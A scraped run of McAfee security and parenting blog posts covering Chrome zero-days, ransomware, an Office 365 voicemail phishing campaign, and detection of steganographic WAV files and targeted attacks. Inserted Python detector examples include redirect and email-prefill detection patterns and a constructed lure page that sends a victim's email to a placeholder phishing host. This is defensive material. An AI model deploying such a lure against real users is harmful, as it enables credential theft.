For parents, this force field of influence can feel impossible to penetrate. Many (this mom included) constantly feel torn. As our kids mature, we want to give them space to explore and form opinions and preferences of their own apart from our commentary. On the flip side, technology brings more risk to the choices kids make today. Those risks can be severe and include online scams connected to celebrities, data breaches, and mental health issues linked to social influence.

Equipping vs. Condemning

So, what practical steps can we take to help our kids think more critically about the role models, celebrities, or influencers they choose to follow and even emulate? One way to move the needle is to thoughtfully and consistently increase the dialogue about values, beliefs, and goals.

Keeping the conversation focused can be tricky. The goal of guiding your child should aim to equip, not condemn. Hint: The goal isn’t to debate the questionable things a celebrity or influencer chooses to say or do. The goal is to explore and build the values that inform the things your child chooses to say and do.

Here are a few conversation starters to challenge your child to look a little more closely at the influencers and celebrities he or she esteems.

Family Talking Points

Highlight common ground. I instantly connected with Mary Lou Retton because we were about the same age and were both half-pints. She was 4’9”, and at that time, I was barely an inch taller and struggling with that. But Mary Lou was fierce, unstoppable, and had a positive attitude that was contagious. Suddenly, short was cool. In talking to your child about the people they admire, point to the common ground he or she might share with that person. Questions: What kind of character or personal traits do you think you might share with this person? How do you think the two of you are similar or different? If you could have lunch with this person, what do you think you could teach them? What could they teach you?

Find the friction. Encourage your child to look beyond the social surface and find influencers who have overcome real-life struggles. The discussion might turn to issues such as depression, grief, addiction, bullying, or dealing with a disability. Questions: What influencers or celebrities do you admire who have conquered a difficult situation? What have you learned from watching how he or she responded to that situation? How do you think you might respond if you were in that situation?

Learn the back story. If your child admires a person and you can’t figure out the reason, challenge her thinking. If the reasoning is that someone is “so pretty” or “goes to Coachella,” challenge your child to dig deeper and learn as much as she can about her favorite person. Questions: What specific qualities or achievements do you think make this person famous? Do you agree with that? Did you discover events in this person’s life that may have shaped who they are? What did you learn about this person that makes you admire them more? What did you learn that makes you admire them less? How does this person help others? If you were in this person’s shoes, how would you use your influence differently?

Get personal. Sometimes we can strengthen a perspective by looking close to home. Challenge your child to think about the people in his or her family or community. Who do you know that stands up for what’s right? Who makes time to help others? Point out someone who has conquered an addiction or made a courageous comeback of some kind. Questions: What do you think are the three most important traits a person can have? Who do you know who has these traits? If you overheard people talking about you in the future, what words would you hope they would use to describe you?

Asking great questions can improve the quality of family conversations. While technology has changed our vocabulary in dramatic ways, the meaning we apply to our words can survive any cultural shift if we’re intentional. Take the time this week to ask your kids great questions. And stick with it, parents — you have more influence than you think.

What You Need to Know About the Google Chrome Vulnerabilities https://www.mcafee.com/blogs/consumer/consumer-threat-notices/google-chrome-vulnerabilities/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/google-chrome-vulnerabilities/#respond Fri, 01 Nov 2019 23:05:03 +0000 https://securingtomorrow.mcafee.com/?p=97259

While you might have been preoccupied with ghosts and goblins on Halloween night, a different kind of spook began haunting Google Chrome browsers. On October 31st, Google Chrome engineers issued an urgent announcement for the browser across platforms due to two zero-day security vulnerabilities, one of which is being actively exploited in the wild (CVE-2019-13720).

So, what is the Google Chrome zero-day exploit? While few specific details are known at this time, researchers did uncover that the bug is a use-after-free flaw: a memory corruption bug in which a program keeps using a region of memory after it has been freed. If this occurs, it can cause a variety of issues, including program crashes, execution of malicious code, or even an attacker gaining full remote access to the device.

The second of the two vulnerabilities (CVE-2019-13721) affects PDFium, a platform developed by Foxit and Google. PDFium is an open-source software library that developers use for viewing and searching PDF documents. Like the first bug, this flaw is also a use-after-free vulnerability. However, there have been no reports of it being exploited by cybercriminals for malicious purposes yet.

Luckily, Google has quickly acknowledged the vulnerabilities and is rolling out a patch for these bugs over the coming days. Meanwhile, follow these security tips to help safeguard your data and devices:

  • Update, update, update. Be sure to install the latest Chrome browser update immediately to help mitigate any risk of falling victim to these exploits.
  • Turn on automatic updates. Practice good security hygiene by turning on automatic updates. Cybercriminals rely on unpatched software to exploit vulnerabilities, so ensure that your device software is updated as soon as patches are available.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

ST12: IoT in Energy & Manufacturing https://www.mcafee.com/blogs/other-blogs/podcast/st12-iot-in-energy-manufacturing/ https://www.mcafee.com/blogs/other-blogs/podcast/st12-iot-in-energy-manufacturing/#comments Fri, 01 Nov 2019 14:00:34 +0000 https://securingtomorrow.mcafee.com/?p=97253

In this episode, security operations solutions strategists Andrew Lancashire and Kate Scarcella discuss the world of Internet of Things inside the Energy and Manufacturing industries.

Ransomware: The Digital Plague that Still Persists https://www.mcafee.com/blogs/enterprise/ransomware-the-digital-plague-that-still-persists/ https://www.mcafee.com/blogs/enterprise/ransomware-the-digital-plague-that-still-persists/#respond Thu, 31 Oct 2019 14:30:27 +0000 https://securingtomorrow.mcafee.com/?p=97251

Ransomware began its reign of cyber terror in 1989 and remains a serious and dangerous threat today. In layman’s terms, ransomware is malware that employs encryption to lock users out of their devices or block access to critical data or files. A sum of money, or ransom, is then demanded in return for access to the information. Some effects of ransomware include downtime, data loss, possible intellectual property theft, major financial consequences and more.

The Rise of Ransomware

Ransomware and its variants are rapidly evolving. McAfee Labs found that ransomware grew by 118% in the first quarter of 2019 and discovered new ransomware families using innovative techniques to target and infect enterprises. By volume, the three most active ransomware families in Q1 were Dharma, GandCrab and Ryuk.

Many variations of ransomware exist. We have often seen ransomware and other malware distributed through email spam campaigns or targeted attacks. But in Q1, our researchers found an increasing number of attacks gaining access to companies through open and exposed remote access points, such as RDP and Virtual Network Computing (VNC). RDP credentials can be brute-forced, obtained from password leaks, or simply bought in underground markets. Notably, the Dharma ransomware used the RDP attack method, while GandCrab and Ryuk mostly used spear-phishing as a distribution mechanism.

The Impact of Ransomware

Earlier this year, cybercriminals targeted the city of Riviera Beach, Fla., a waterfront suburb north of Palm Beach. After major disruptions in municipal services resulting from the ransomware, city leaders complied with the hacker gang’s demand of 65 bitcoin (roughly $600,000) in exchange for the decryption key. Although not recommended, we’ve seen a number of victims give in to the extortion demands of attackers, often paying a ransom of hundreds or thousands of dollars in order to restore their systems. In the end, you may reduce downtime by paying the ransom, but there is never a guarantee that you will receive a decryption key, and you will be funding criminal activity.

The impact of ransomware is more than merely a nuisance. Companies tend to experience temporary or permanent loss of sensitive or proprietary information, disruption to regular operations, financial losses incurred to restore systems and files, and potential harm to an organization’s reputation.

How to Defend Against Ransomware

We must not forget that with every cyberattack, there is always a human cost, whether it’s a business dealing with an outage or a consumer dealing with a major fraud. It’s important to develop a proactive disaster recovery plan to increase your chances of withstanding ransomware. To help steer clear of ransomware, below are a few tips to follow:

  • Defend – Sufficiently robust security solutions can protect you from known threats as well as those that have not yet been formally detected. Always downloading the newest version of your operating system or apps helps you stay ahead of threats.
  • Back up your data – Frequently back up essential data, ideally storing it both locally and on the cloud.
  • Stay informed – Resources such as nomoreransom.org—an initiative created by the National High Tech Crime Unit of Netherlands, Europol’s European Cybercrime Centre, and McAfee—aim to provide prevention education and help ransomware victims retrieve their encrypted data without having to pay criminals.

Chapter Preview: Ages 11 to 17 – From Tweens to Teens https://www.mcafee.com/blogs/consumer/consumer-threat-notices/from-tweens-to-teens/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/from-tweens-to-teens/#respond Thu, 31 Oct 2019 10:00:43 +0000 https://securingtomorrow.mcafee.com/?p=96534

For anyone who asks what happens during the tween through teen years, the best answer is probably, “What doesn’t happen?!”

Just so you know, I’ve been there, done that, and got the T-shirt. And I survived. My kids were the first generation to grow up on social media. Like most teens in the mid-2000s, they got their first taste with MySpace and then switched to Facebook as the masses shifted there around 2009. They also got into other platforms, like Instagram, and stuck with them while others came and went. And yes, sharing almost every facet of their lives presented many challenges. I won’t get into details here as it might embarrass my kids, but suffice it to say that mistakes were made.

Being a security and privacy practitioner, I made sure there were lots of discussions on how to use these platforms safely. The early discussions centered on privacy and the permanence of data, but eventually led to security talks as the platforms were inundated with scams and other malicious activities. As you can imagine, when my kids were tweens and teens, the internet was a different place than it is today, and I’m sure it will be very different 10 to 15 years from now.

This chapter of “Is Your Digital Front Door Unlocked?” steps you through what your tween and teen face as they spend an increasing amount of time online and using connected things. It expands upon some of the topics discussed earlier in the book with more of an eye towards how those topics impact this age group, while offering advice and insights on topics that often surface at this age. We tackle some big topics too, such as when to get your child a smartphone, how many children will make friends that they will only know online, cyberstalking, and the secret digital life of teens that every parent should know. This chapter packs a big punch—as it should, because these are some big years for parents and kids alike.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

3 Tips to Protect Yourself From the Office 365 Phishing Scams https://www.mcafee.com/blogs/consumer/consumer-threat-notices/office-365-phishing/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/office-365-phishing/#respond Thu, 31 Oct 2019 04:01:15 +0000 https://securingtomorrow.mcafee.com/?p=97244

Cybercriminals seem to get more and more sophisticated with their attacks, and phishing scams are no different. The McAfee Labs team has observed a new phishing campaign using a fake voicemail message to trick victims into giving up their Office 365 email credentials. During the investigation, the team has found three different phishing kits being used to exploit targets.

How exactly does this sneaky phishing scam work? It all begins when a victim receives an email stating that they’ve missed a phone call, along with a request to log into their account to access the voice message. The email also contains an attached HTML file that redirects the victim to a phishing website. This website prepopulates the victim’s email address and asks them to enter their Office 365 credentials. What’s more, the stealthy attachment contains an audio recording of someone talking, leading the victim to believe that they are listening to a legitimate voicemail.

Once the victim enters their password, they are presented with a page stating that their login was successful. The victim is then redirected to the office.com login page, leading them to believe that everything is perfectly normal. Little do they know that their credentials have just been harvested by a cybercriminal.

While this sneaky scheme has been primarily used to target organizations, there is much to be taken away from this incident, as cybercriminals often disguise themselves as businesses to phish for user data. To protect yourself from these stealthy scams, check out the following tips:

  • Go directly to the source. Be skeptical of emails claiming to be from companies with peculiar asks or messages. Instead of clicking on a link within the email, it’s best to go straight to the company’s website to check the status of your account or contact customer service.
  • Be cautious of emails asking you to take action. If you receive an email asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links.
  • Hover over links to see and verify the URL. If someone sends you an email with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the email altogether.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Office 365 Users Targeted by Voicemail Scam Pages https://www.mcafee.com/blogs/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/office-365-users-targeted-by-voicemail-scam-pages/#respond Thu, 31 Oct 2019 04:01:09 +0000 https://securingtomorrow.mcafee.com/?p=97170

Over the past few weeks McAfee Labs has been observing a new phishing campaign using a fake voicemail message to lure victims into entering their Office 365 email credentials. At first, we believed that only one phishing kit was being used to harvest the user’s credentials. However, during our investigation, we found three different malicious kits and evidence of several high-profile companies being targeted. McAfee customers using VSE, ENS, LiveSafe, WebAdvisor and MGW are protected against this phishing campaign.

The attack begins when the victim receives an email informing them that they have missed a phone call, along with a request to log in to their account to access their voicemail.

An example of the malicious email is shown below:

The phishing email contains an HTML file as an attachment which, when loaded, will redirect the user to the phishing website. There are slight variations in the attachment, but the most recent ones contain an audio recording of someone talking, which will lead the victim to believe they are listening to the beginning of a legitimate voicemail.

The HTML code which plays the recording is shown below:

Once redirected, the victim is shown the phishing page which asks them to log into their account. The email address is prepopulated when the website is loaded; this is another trick to reinforce the victim’s belief that the site is legitimate.

When the password is entered, the user is presented with the following successful login page and redirected to the office.com login page.

We observed the following filenames being used for the attachments:

  • 10-August-2019.wav.html [Format: DD-Month-YYYY.wav.html]
  • 14-August-2019.html [Format: DD-Month-YYYY.html]
  • Voice-17-July2019wav.htm [Format: Voice- DD-MonthYYYYwav.htm]
  • Audio_Telephone_Message15-August-2019.wav.html [Format: Audio_Telephone_MessageDD-Month-YYYY.wav.html]
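As an added example (not part of the McAfee post), a small Python triage routine that scores an email attachment against the indicators described above: the date-style filename formats, an embedded audio element, a script or meta redirect, and a redirect URL carrying a prefilled email parameter. The function name `analyse_attachment`, the sample lure HTML and the placeholder domain `phish-site.invalid` are all constructed for the demonstration.

```python
import re
from dataclasses import dataclass
from html.parser import HTMLParser

# The four filename formats listed above, generalised into one pattern: an optional
# "Voice-" or "Audio_Telephone_Message" prefix, DD-Month-YYYY (the hyphen before the
# year is sometimes dropped), an optional "wav" or ".wav", then .htm or .html.
ATTACHMENT_NAME_RE = re.compile(
    r"^(?:Voice-|Audio_Telephone_Message)?"
    r"\d{1,2}-[A-Z][a-z]+-?\d{4}"
    r"(?:\.?wav)?\.html?$"
)

# Script idioms a lure page can use to hand the victim off to the phishing site.
REDIRECT_RE = re.compile(
    r"window\.location|location\.href|location\.replace\(|location\.assign\(",
    re.IGNORECASE,
)
# The phishing page prepopulates the victim's address; the observed URLs end in "?email=".
PREFILLED_EMAIL_RE = re.compile(r"[?&]email=", re.IGNORECASE)


class _LureParser(HTMLParser):
    """Collects the signals of interest from an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.has_audio = False
        self.meta_refresh = ""       # content of <meta http-equiv="refresh">, if any
        self.script_text = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if (tag == "audio" or a.get("type", "").startswith("audio/")
                or a.get("src", "").startswith("data:audio/")):
            self.has_audio = True
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.meta_refresh = a.get("content", "")
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


@dataclass(frozen=True)
class Verdict:
    filename_matches: bool
    has_audio: bool
    has_redirect: bool
    prefills_email: bool

    @property
    def score(self) -> int:
        return sum([self.filename_matches, self.has_audio,
                    self.has_redirect, self.prefills_email])

    @property
    def suspicious(self) -> bool:
        # Any two signals together are enough to pull the attachment for analyst
        # review; one on its own (a date-named file, say) is too noisy.
        return self.score >= 2


def analyse_attachment(filename: str, html: str) -> Verdict:
    parser = _LureParser()
    parser.feed(html)
    parser.close()
    script = "\n".join(parser.script_text)
    return Verdict(
        filename_matches=ATTACHMENT_NAME_RE.match(filename) is not None,
        has_audio=parser.has_audio,
        has_redirect=bool(parser.meta_refresh) or REDIRECT_RE.search(script) is not None,
        prefills_email=PREFILLED_EMAIL_RE.search(script + "\n" + parser.meta_refresh) is not None,
    )


# Constructed test inputs (not campaign artefacts): a stripped-down lure whose
# redirect target is a placeholder domain, and an ordinary HTML report.
SAMPLE_LURE = """<html><body>
<audio autoplay><source src="data:audio/wav;base64,UklGRg==" type="audio/wav"></audio>
<script>
  window.location = "https://phish-site.invalid/live/?email=" + "user@example.com";
</script>
</body></html>"""

SAMPLE_BENIGN = """<html><body><h1>Quarterly report</h1>
<p>No audio element, no redirect.</p></body></html>"""

if __name__ == "__main__":
    for name, body in (("10-August-2019.wav.html", SAMPLE_LURE), ("report.html", SAMPLE_BENIGN)):
        verdict = analyse_attachment(name, body)
        print(f"{name}: suspicious={verdict.suspicious} {verdict}")
```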

Phishing Sites

As explained in the introduction, we were surprised to observe three different phishing kits being used to generate the malicious websites. All three look almost identical but we were able to differentiate them by looking at the generated HTML code and the parameters which were accepted by the PHP script.

Voicemail Scmpage 2019 (Not a typo)

The first kit is being sold on an ICQ channel and the creator advertises it on social media. The kit goes by the name of ‘Voicemail Scmpage 2019’ and operates on a license key basis, where the license key is checked prior to the phishing site being loaded.

A snippet of the generated HTML code is shown below:

A file, data.txt, is created on the compromised website and it contains a list of visitors, including their IP address, web browsers and the date.

The following data is harvested from the victims and emailed to the owner of the phishing site:

  • Email
  • Password
  • IP Address
  • Region (Location)

Office 365 Information Hollar

The second phishing kit we discovered is called ‘Office 365 Information Hollar’. This kit is very similar to ‘Voicemail Scmpage 2019’ and gathers the same data, as shown in the image below:

Third “Unnamed” Kit

The final phishing kit is unbranded, and we could not find any attribution to it. This kit makes use of code from a previous malicious kit targeting Adobe users back in 2017. It is possible that the original author from 2017 has modified this kit, or perhaps more likely the old code has been re-used by a new group.

This kit also harvests the same data as the previous two. The ‘Unnamed Kit’ is the most prevalent malicious page we have observed while tracking these voicemail phishing campaigns.

Targeted Industries

During our investigation we observed the following industries being targeted with these types of phishing emails:

[Chart: targeted industries by sector. Services includes tourism, entertainment, real estate and others which are too small to group]

A wide range of employees were targeted, from middle management to executive level staff. We believe that this is a ‘Phishing’ and ‘Whaling’ campaign.

Conclusion

The goal of malicious actors is to harvest as many credentials as possible, to gain access to potentially sensitive information and open the possibility of impersonating staff, which could be very damaging to the company. The entered credentials could also be used to access other services if the victim uses the same password, and this could leave them open to a wider range of targeted attacks.

What sets this phishing campaign apart from others is the fact that it incorporates audio to create a sense of urgency which, in turn, prompts victims to access the malicious link. This gives the attacker the upper hand in the social engineering side of this campaign.

We urge all our readers to be vigilant when opening emails and to never open attachments from unknown senders. We also strongly advise against using the same password for different services and, if a user believes that his/her password is compromised, it is recommended to change it as soon as possible.

It is highly recommended to use Two-Factor Authentication (2FA) since it provides a higher level of assurance than authentication methods based on Single-Factor Authentication (SFA), like the one that many users utilise for their Office 365 accounts.

When possible for enterprise customers, we recommend blocking .html and .htm attachments at the email gateway level so this kind of attack will not reach the final user.

Also, be sure to read our companion blog which details how you can stay safe from such phishing campaigns.

Indicators of Compromise

Email attachments with the following filenames:

  • 10-August-2019.wav.html [Format: DD-Month-YYYY.wav.html]
  • 14-August-2019.html [Format: DD-Month-YYYY.html]
  • Voice-17-July2019wav.htm [Format: Voice- DD-MonthYYYYwav.htm]
  • Audio_Telephone_Message15-August-2019.wav.html [Format: Audio_Telephone_MessageDD-Month-YYYY.wav.html]

McAfee Detections

  • HTML/Phishing.g V2 DAT = 9349, V3 DAT = 3800
  • HTML/Phishing.av V2 DAT = 9371, V3 DAT = 3821
  • HTML/Phishing.aw V2 DAT = 9371, V3 DAT = 3821

The hashes of the attachments will not be provided, as this would reveal information on the potential targets.

Domains (all blocked by McAfee WebAdvisor):

A Cybersecurity Horror Story: Stay Secure From October’s Creepiest Threats https://www.mcafee.com/blogs/consumer/consumer-threat-notices/creepiest-threats/ https://www.mcafee.com/blogs/consumer/consumer-threat-notices/creepiest-threats/#respond Mon, 28 Oct 2019 18:10:37 +0000 https://securingtomorrow.mcafee.com/?p=97228

Halloween time is among us and ghosts and goblins aren’t the only things lurking in the shadows. This past month has brought a variety of spooky cyberthreats that haunt our networks and devices. From malicious malware to restricting ransomware, October has had its fair share of cyber-scares. Let’s take a look at what ghoulish threats have been leading to some tricks (and no treats) around the cybersphere this month.

Ghostcat Malware

One ghost that recently caused some hocus pocus across the Web is Ghostcat-3PC. According to SC Magazine, the malware’s goal is to hijack users’ mobile browsing sessions.

The infection begins when a user visits a particular website and is served a malicious advertisement. Ghostcat fingerprints the browser to collect device information and determines if the ad is running on a genuine webpage. Ghostcat also checks if the ad is running on an online publishers’ page that has been specifically targeted by this campaign. If these conditions are met, then the malware serves a malicious URL linked to the ad.

From there, this URL delivers obfuscated JavaScript, that is, source or machine code deliberately made hard to read. The attackers behind Ghostcat use this to evade the publishers’ ad blockers, preventing them from detecting malicious content. The code also checks for additional conditions necessary for the attack, for example ensuring that the malware is being run on a mobile device and a mobile-specific browser. If the malware concludes that the browsing environment fits the description of its target, it serves a fraudulent pop-up, leading the user to malicious content.

Bewitched WAV Files

Ghostcat isn’t the only way malware is being spread lately. According to ZDNet, attackers have manipulated WAV audio files to spread malware and cryptominers. By using a technique called steganography, malware authors can hide malicious code inside a file that appears normal, which allows hackers to bypass security software and firewalls.

Previously, cybercriminals have used steganography with image file formats like PNG or JPEG. However, these crooks have now upped the ante by using WAV audio files to hide different types of malware. Most recently, researchers found that this technique is used to hide DLLs, or dynamic link libraries, which contain code and data that can be used by more than one program at the same time. If malware was already present on an infected host device, it would download and read the WAV file, extract the DLL, and install a cryptocurrency miner called XMRig. Cryptocurrency miners compile transactions into blocks by solving complicated mathematical problems, competing with other miners for bitcoins. To do this, miners need a ton of computer resources. As a result, miners tend to drain the victim’s device of its processor’s resources, creating a real cybersecurity headache.
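As an added example (not code from the ZDNet research or from McAfee), a Python checker that walks the RIFF chunk structure of a WAV file and reports what a carrier for smuggled code tends to leave behind: bytes appended after the declared RIFF payload, chunk types a plain PCM file has no reason to carry, and a PE header signature inside non-audio regions. It does not catch payloads hidden bit by bit inside the audio samples themselves; `build_wav`, `make_chunk` and the sample files are constructed for the demonstration.

```python
import struct

# Chunk identifiers a plain PCM WAV file has a reason to carry.
EXPECTED_CHUNKS = {b"fmt ", b"data", b"LIST", b"fact", b"cue ", b"PEAK"}
PE_MAGIC = b"MZ"   # DOS header that starts every PE file (DLL or EXE)


def make_chunk(cid: bytes, body: bytes) -> bytes:
    """RIFF chunk: 4-byte id, little-endian size, body padded to even length."""
    return cid + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def build_wav(samples: bytes, extra_chunks: bytes = b"") -> bytes:
    """Minimal 8-bit mono 8 kHz PCM WAV around `samples` (constructed test helper)."""
    fmt = struct.pack("<HHIIHH", 1, 1, 8000, 8000, 1, 8)
    body = make_chunk(b"fmt ", fmt) + make_chunk(b"data", samples) + extra_chunks
    return b"RIFF" + struct.pack("<I", 4 + len(body)) + b"WAVE" + body


def wav_anomalies(blob: bytes) -> list:
    """Structural findings for a WAV blob; an empty list means nothing stood out."""
    findings = []
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        return ["not a RIFF/WAVE container"]

    declared_end = 8 + struct.unpack_from("<I", blob, 4)[0]
    if declared_end > len(blob):
        findings.append(f"RIFF size points {declared_end - len(blob)} bytes past EOF "
                        "(truncated or forged header)")
    elif declared_end < len(blob):
        # Players stop at the declared size, so anything after it never affects
        # playback: a convenient place to park a payload.
        trailer = blob[declared_end:]
        findings.append(f"{len(trailer)} trailing bytes after the declared RIFF payload")
        if PE_MAGIC in trailer:
            findings.append("PE header signature in trailing data")

    pos, end = 12, min(declared_end, len(blob))
    while pos + 8 <= end:
        cid = blob[pos:pos + 4]
        csize = struct.unpack_from("<I", blob, pos + 4)[0]
        body = blob[pos + 8:pos + 8 + csize]
        if len(body) < csize:
            findings.append(f"chunk {cid!r} declares {csize} bytes but only {len(body)} remain")
            break
        if cid not in EXPECTED_CHUNKS:
            findings.append(f"unexpected chunk {cid!r} of {csize} bytes")
        # Audio samples can contain any byte pair, so only non-audio chunks are
        # searched for the PE marker; this is a coarse heuristic, not a PE parser.
        if cid != b"data" and PE_MAGIC in body:
            findings.append(f"PE header signature inside chunk {cid!r}")
        pos += 8 + csize + (csize & 1)   # chunk bodies are padded to even length
    return findings


if __name__ == "__main__":
    clean = build_wav(b"\x80" * 64)
    smuggled = clean + b"MZ\x90\x00" + b"\x00" * 60     # payload appended after the container
    hidden = build_wav(b"\x80" * 64, make_chunk(b"junk", b"MZ\x90\x00PE\x00\x00"))
    for label, blob in (("clean", clean), ("smuggled", smuggled), ("hidden", hidden)):
        print(label, wav_anomalies(blob) or ["ok"])
```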

MedusaLocker Ransomware

Finally, we have the mysterious MedusaLocker ransomware. According to BleepingComputer, this threat is slithering its way onto users’ devices, encrypting files until the victim purchases a decryptor.

This strain will perform various startup routines to prep the victim’s device for encryption. Additionally, it will ensure that Windows networking is running and mapped network drives (shortcuts to a shared folder on a remote computer or server) are accessible. Then, it will shut down security programs, clear data duplicates so they can’t be used to restore files, remove backups made with Windows backup, and disable the Windows automatic startup repair.

For each folder that contains an encrypted file, MedusaLocker creates a ransom note with two email addresses to contact for payment. However, it is currently unknown how much the attackers are demanding for the victim to have their files released or if they actually provide a decryptor once they receive a payment.

With all of these threats attempting to haunt networks and devices, what can users do to help themselves have a safe and secure spooky season? Follow these tips to keep cybersecurity tricks at bay:

  • Watch what you click. Avoid clicking on unknown links or suspicious pop-ups, especially those coming from someone you don’t know.
  • Be selective about which sites you visit. Only use well-known and trusted sites. One way to determine if a site is potentially malicious is by checking its URL. If the URL address contains multiple grammar or spelling errors and suspicious characters, avoid interacting with the site.
  • If your computer slows down, be cautious. One way to identify a cryptojacking attack is poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Surf the web safely. You can use a tool like McAfee WebAdvisor, which will flag any sites that may be malicious without your knowing.
  • Use a comprehensive security solution. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Did You Check Your Quarantine?! https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/ https://www.mcafee.com/blogs/other-blogs/mcafee-labs/did-you-check-your-quarantine/#respond Mon, 28 Oct 2019 16:02:38 +0000 https://securingtomorrow.mcafee.com/?p=97203

A cost-effective way to detect targeted attacks in your enterprise

While it is easy to get caught up in the many waves of new and exciting protection strategies, we have recently discovered an interesting approach to detect a targeted attack and the related actor(s). Quite surprisingly, a big part of the solution already exists in most enterprises: the tried-and-tested endpoint security platform. In this case, we used our own McAfee Endpoint Security (ENS). Along with ENS, we used GetQuarantine, a freeware tool from McAfee, and a third-party threat analytics service.

The Problem

We will begin with a working definition of a targeted attack:

A targeted attack is a threat in which a threat actor actively pursues and compromises a specific target. To achieve the goal, the adversary may adapt and improve their attack(s) to counter the victim’s defenses and persist at it for a long period of time.

What does this say? First, the adversary’s objective is to compromise a specific target, not just an arbitrary target. Second, the adversary is skilled enough to know how defenses work and is resourceful enough to actively adapt and improve their attack to beat defenses. Third, the adversary is determined enough to pursue the objective for perhaps an indefinite period of time.

Taken together, the above characteristics challenge most defense technologies. Why so? Because these characteristics run counter to the assumptions on which these technologies are based.

At the heart of it, most defense technologies are signature-based, where the signatures are created either by a human analyst, by a machine, or by using instances of known malicious behavior. The cost of constructing signatures is high and is amortized by using the same signature to defend against the same attack elsewhere.

Twenty years ago, when there were just a few thousand examples of malicious software around, it was relatively easy to find the origin, perpetrators, and the reason for the creation and release of a malicious file or application. Security researchers would manually analyze each sample, carefully identify similarities with previously known samples through sheer memory and label each sample with a unique name. This method worked well because the attacks then were opportunistic and aimed at spreading as wide as possible. This meant that anti-virus companies could discover an attack in one place, extract relevant detection signatures, and send the signature updates to its install base.

Now, security threat intelligence companies receive hundreds of thousands of new malware samples every day. There is simply not enough time or resources to analyze each sample to answer who, what, when, and why. The best any anti-virus software can do is to classify a file into just two bins: good or bad. It is impossible for researchers to manually look at every sample and process them to the same detail as before. To make matters worse, attacks today are targeted. Attackers create one-off variants aimed at a specific enterprise. This makes it virtually impossible to connect attacks across enterprises to understand the attacker.

And therein lies an important problem. Just as the number and sophistication of attacks have increased exponentially, the ability to track who is behind an attack, to link different malware samples to their authors, and to understand the intent behind an attack has been lost.

Why should it matter? In the absence of information about who is attempting to breach an organization, defenders are left operating in the dark. They make security decisions based on breaches that happen elsewhere using threat intelligence that is most often irrelevant, and when relevant, is most likely outdated.

The Solution

Analysis of targeted campaigns shows that programs that are part of an attack usually share a couple of characteristics. First, the malware or attack mechanism is focused on one enterprise or, at most, one sector; second, the malware program demonstrates evolutionary characteristics, where the actor repeatedly unleashes different variants of it. Our proposed solution focuses on these characteristics and tries to uncover targeted campaigns by finding binary semantic similarity between malware found in customer environments and malware from known targeted campaigns.

Our solution strategy is:

Endpoint-security detects a malware sample. It is compared with a sample from a known targeted attack. If the similarity is high, it is a strong indication that the ENS detected sample is a part of that targeted attack and the threat actor is the same.

The strategy is implemented in three building blocks: sample collector, sample storage and targeted attack analysis using third-party threat analytics application.

Sample Collector (GetQuarantine)

Sample collection is performed using McAfee proprietary licensed freeware, GetQuarantine. GetQuarantine is a McAfee ePolicy Orchestrator (ePO) deployable tool that can run on all endpoints protected by McAfee ENS. GetQuarantine runs as an ePO scheduled product deployment task. ENS cleans or deletes items that are detected as threats and saves copies in a non-executable format to the Quarantine folder. On each scheduled run, the GetQuarantine tool checks the quarantine folder and uploads to the McAfee backend any items that were not already uploaded during previous runs.

Sample Storage (McAfee Workflow & AWS)

The McAfee workflow backend receives sample submissions from GetQuarantine and stores them in an S3 bucket. Samples are segregated per enterprise and made available for further analysis. Third-party analytics applications like MAGIC can be run on samples to extract targeted attack insights. Analytics services are available to McAfee customers participating in a third-party analytics program. For customers that do not participate in a third-party analytics program, sample processing ends at the McAfee backend layer and the sample eventually gets deleted without further analysis.

Targeted Attack Analysis

For our pilot implementation we used Cythereal MAGIC services. The McAfee backend submits samples to MAGIC for binary similarity analysis. Customers can check analysis reports using the Cythereal website. Cythereal is a McAfee Security Innovation Alliance (SIA) partner.

Cythereal MAGIC™ (malware genomic correlation) is a web service touted as “BinDiff on Steroids”. The system carries out semantic similarity analysis of programs using advanced program analysis techniques at the assembly-instruction level. The semantics of the program give more meaningful insights than structural or behavioral characteristics. MAGIC can find similarity between samples submitted using GetQuarantine and can also find variants of those samples in MAGIC’s database. It can provide alerts for campaign detections and can generate YARA rules that can be used for searching other services, like VirusTotal.

We first tried human-driven in-house analysis using open source tools like SSDEEP, SDHASH, TLSH, etc. to prove the concept of identifying targeted attacks using the binary similarity of samples found in quarantine. Though we were successful in proving this concept with these open source tools, they were not very effective, especially with polymorphic variants, so we explored third-party options and identified Cythereal MAGIC™.
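The linkage strategy described above (compare a quarantined sample with a sample from a known targeted attack and treat high similarity as evidence of the same campaign), together with the fuzzy-hash comparison this paragraph describes trying with SSDEEP-style tools, as an added Python illustration that is not McAfee's, Cythereal's or ssdeep's code: the rolling hash, block size, scoring and the byte samples are constructed assumptions chosen for clarity.

```python
import difflib
import random
from collections import deque

# Context-triggered piecewise hashing (CTPH) reduced to its essentials.  The
# window length, trigger block size and score are assumptions for this example;
# they are not the parameters of ssdeep, TLSH or MAGIC.
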